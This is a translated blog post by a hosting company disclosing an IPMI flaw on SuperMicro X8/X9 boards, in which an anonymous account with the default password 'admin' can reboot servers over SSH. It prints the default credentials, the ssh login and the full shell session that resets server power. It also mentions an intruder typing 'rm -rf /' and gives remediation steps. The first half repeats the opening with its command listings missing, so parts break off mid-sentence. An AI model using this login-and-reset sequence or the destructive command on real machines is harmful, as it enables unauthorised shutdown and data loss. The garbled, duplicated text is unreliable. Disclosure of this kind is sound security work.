IPMI vulnerability in shell v. 1.00 allowing to reboot the server
We welcome you dear Habrovchane!
From now on, the GlobaTel team will try to please you with informative articles in the field of hosting and data centers, as well as sometimes publish our achievements purely from a technical point of view.
')
Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI .
One of our clients complained that a new server c xeon E3 from a well-known Russian brand very often reboots. Going to the IPMI server, we saw the actively typing command
I must say that we solved this problem by blocking all IPMI IP. Access is now granted only to IP clients by prior arrangement.
The problem is closed in the shell version 1.00.
We show some of the tricks (server reboot) that can be cranked. The ability to connect to IPMI over SSH is not known to everyone. This feature allows you to restart the server. It turns out that through the web interface you cannot change the password for anonymouse, which has the standard admin password and which for some reason can reboot the machine via SSH.
Here is a listing of commands when connecting to IPMI via SSH:
Ping server:
As you can see - there is no ping, the server restarts.
Addition - the problem relates to IPMI version 2.0 (not bios) 1.00 for SuperMicro X8 and X9 series motherboards and dual-processor boards for Xeon 56xx series processors
Switching off the user anonymouse need to be done through ipmitool.
Listing for installation on Linux:
The command to disable anonymouse:
From now on, the GlobaTel team will try to please you with informative articles in the field of hosting and data centers, as well as sometimes publish our achievements purely from a technical point of view.
')
Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI .
One of our clients complained that a new server c xeon E3 from a well-known Russian brand very often reboots. Going to the IPMI server, we saw the actively typing command
rm -rf / . Who saw this - he will understand. They pulled out the power cord - they went with the netbook to set up the server and figure out what's what.I must say that we solved this problem by blocking all IPMI IP. Access is now granted only to IP clients by prior arrangement.
The problem is closed in the shell version 1.00.
We show some of the tricks (server reboot) that can be cranked. The ability to connect to IPMI over SSH is not known to everyone. This feature allows you to restart the server. It turns out that through the web interface you cannot change the password for anonymouse, which has the standard admin password and which for some reason can reboot the machine via SSH.
Here is a listing of commands when connecting to IPMI via SSH:
Password of anonymous: admin
# ssh -o PreferredAuthentications=password,keyboard-interactive -l "" IPMI
@IPMI's password:
Auth User/Pass with PS...pass.
ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
-> show
/
Targets :
system1
Properties :
None
Verbs :
cd
show
help
version
exit
-> cd system1
/system1
-> show /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
Targets :
none
Properties :
Name=IPMI Power Service
CreationClassName=IPMI_PowerManagementService
ElementName=Server Power Management Service
EnabledState=5
RequestedState=12
EnabledDefault=2
PowerState=1
Verbs :
cd
show
help
version
exit
start
stop
reset
-> reset /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
reset done...
Ping server:
ping IpOfServer
Pinging IpOfServer with 32 bytes of data:
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Ping statistics for IpOfServer:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
As you can see - there is no ping, the server restarts.
Addition - the problem relates to IPMI version 2.0 (not bios) 1.00 for SuperMicro X8 and X9 series motherboards and dual-processor boards for Xeon 56xx series processors
Switching off the user anonymouse need to be done through ipmitool.
Listing for installation on Linux:
wget ftp.supermicro.com/utility/IPMICFG/Linux/IPMICFG-Linux_v1.41.zip
unzip IPMICFG-Linux_v1.41.zip
cd IPMICFG-Linux_v1.41_110706/
chmod 755 *The command to disable anonymouse:
ipmitool user disable 1Source: https://habr.com/ru/post/144811/
All Articles